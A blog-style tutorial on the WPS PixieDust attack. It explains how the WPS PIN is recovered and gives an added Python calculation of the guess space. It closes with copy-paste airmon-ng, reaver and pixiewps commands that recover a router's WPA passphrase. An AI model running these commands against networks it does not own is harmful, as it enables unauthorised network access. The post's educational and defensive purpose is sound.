In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple PIN number instead of your hard-to-guess passphrase. The issue is that this makes your secure 32-character passphrase about as much use as a chocolate fireguard: instead of taking potentially years to crack, an attacker can go after the PIN, which only has 11,000 iterations and can be cracked in hours (even with timeouts and other controls in place).
In this video we will show how a vulnerability in some of the chipsets used in Wireless Access Points allows the WPS PIN to be cracked in less than a second, which in turn reveals the WPA passphrase. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.
The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret, but once they are disclosed we can use them, together with the Enrollee and Registrar Public Keys, the E and R Nonces and the Auth Key, to recover the WPS PIN.
Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 hash and attacking it directly with a single GPU, the estimated time to crack (knowing the passphrase is alphanumeric with no special characters) is 853,399 days, 2 hours and 44 minutes, so yes, WPS adds some weakness to your hardened access point 🙂
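As an added illustration, not part of the original post, the snippet below shows why the figure of 11,000 guesses quoted above is so much smaller than the eight digits of a WPS PIN suggest. The eighth digit is a checksum of the first seven, so only 10,000,000 of the 100,000,000 eight-digit strings are valid PINs, and because the protocol confirms the first four digits separately from the last three (the checksum digit being derivable), the worst case collapses to 10^4 + 10^3 = 11,000 attempts. The checksum rule is the one published in the WPS specification; the one-attempt-per-second rate used for the time estimate is an assumption chosen to match the "hours" claim in the post and is not a measured value.

```python
# Added example (not from the original post): why a WPS PIN gives an
# attacker only 11,000 guesses, and how to sanity-check a PIN's checksum
# when auditing what a device is advertising.

def wps_checksum_digit(first_seven: int) -> int:
    """Return the eighth (checksum) digit for a 7-digit WPS PIN body.

    Per the WPS specification: starting from the rightmost digit of the
    7-digit body, digits in odd positions are weighted 3 and digits in
    even positions are weighted 1; the check digit brings the total to a
    multiple of 10.
    """
    accum = 0
    n = first_seven
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if `pin` is eight digits whose last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    body, check = int(pin[:7]), int(pin[7])
    return wps_checksum_digit(body) == check


def valid_pin_count() -> int:
    """Number of syntactically valid 8-digit WPS PINs (7 free digits + checksum)."""
    return 10 ** 7


def effective_guesses(split_verification: bool = True) -> int:
    """Worst-case number of guesses an attacker needs.

    split_verification=True models the WPS handshake, which confirms the
    first four digits (M4/M5) independently of the last four. The last
    four contain the checksum, so only three of them are free: the search
    is 10^4 for the first half plus 10^3 for the second half.
    """
    if not split_verification:
        return valid_pin_count()
    return 10 ** 4 + 10 ** 3


def worst_case_seconds(guesses: int, seconds_per_attempt: float) -> float:
    """Wall-clock upper bound given an assumed attempt rate (assumption, not measured)."""
    return guesses * seconds_per_attempt


if __name__ == "__main__":
    # Constructed sample PIN: 1234567 + its checksum digit.
    sample_body = 1234567
    sample_pin = f"{sample_body:07d}{wps_checksum_digit(sample_body)}"
    print(f"sample valid PIN: {sample_pin}")
    print(f"valid PINs overall: {valid_pin_count():,}")
    print(f"guesses with split verification: {effective_guesses():,}")
    # Assumed rate of one attempt per second (the post notes lockouts exist).
    hours = worst_case_seconds(effective_guesses(), 1.0) / 3600
    print(f"worst case at 1 attempt/s: {hours:.1f} hours")
```

The point for a defender is in the last two numbers: a 7-digit random secret sounds respectable until the protocol lets each half be confirmed on its own, which is why disabling WPS (or at least the PIN method) is the control that matters, rather than a longer WPA2 passphrase.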
Below are the commands used during the above video; you can copy and paste them, substituting your own information for the placeholders in angle brackets.
iwconfig
airmon-ng start wlan1
airmon-ng check kill
airodump-ng wlan1mon --wps
reaver -i wlan1mon -c <channel number> -b <ap mac address> -vv
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <auth key> -n <e-nonce>
reaver -i wlan1mon -c <channel number> -b <ap mac address> -vv -K 1
If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):
apt-get install build-essential libnl-3-dev libnl-genl-3-dev
wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz
git clone https://github.com/t6x/reaver-wps-fork-t6x
git clone https://github.com/wiire/pixiewps
Finally, in the WPS column you need to be checking for one of the following values to make sure the Access Point has WPS enabled: 1.0, LAB, PBC, NFC or PIN. If none of these appears, either WPS is not supported on the device or you have successfully disabled it.